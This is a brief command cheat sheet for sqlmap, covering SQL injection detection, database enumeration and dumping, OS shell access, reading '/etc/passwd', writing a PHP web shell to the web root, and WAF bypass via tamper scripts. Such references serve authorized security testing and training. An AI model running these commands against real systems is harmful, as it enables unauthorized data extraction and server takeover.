sqlmap is an open-source tool that automates the process of detecting and exploiting SQL injection vulnerabilities. It supports a wide range of database systems and can extract data, access the filesystem, and execute commands.
# Test URL parameter for SQLi
sqlmap -u "http://target.com/page?id=1"
# With POST data
sqlmap -u "http://target.com/login" --data="user=admin&pass=test"
# With cookies/authentication
sqlmap -u "http://target.com/page?id=1" --cookie="session=abc123"
# With headers
sqlmap -u "http://target.com/api" --headers="Authorization: Bearer token"# Database enumeration
sqlmap -u "URL" --dbs # List databases
sqlmap -u "URL" -D dbname --tables # List tables
sqlmap -u "URL" -D db -T users --columns # List columns
sqlmap -u "URL" -D db -T users --dump # Dump data
# System information
sqlmap -u "URL" --current-user
sqlmap -u "URL" --current-db
sqlmap -u "URL" --is-dba# OS shell access (if privileges allow)
sqlmap -u "URL" --os-shell
# File read/write
sqlmap -u "URL" --file-read="/etc/passwd"
sqlmap -u "URL" --file-write="shell.php" --file-dest="/var/www/shell.php"
# Bypass WAF
sqlmap -u "URL" --tamper=space2comment,betweenMySQL, PostgreSQL, Oracle, Microsoft SQL Server, SQLite, and many more.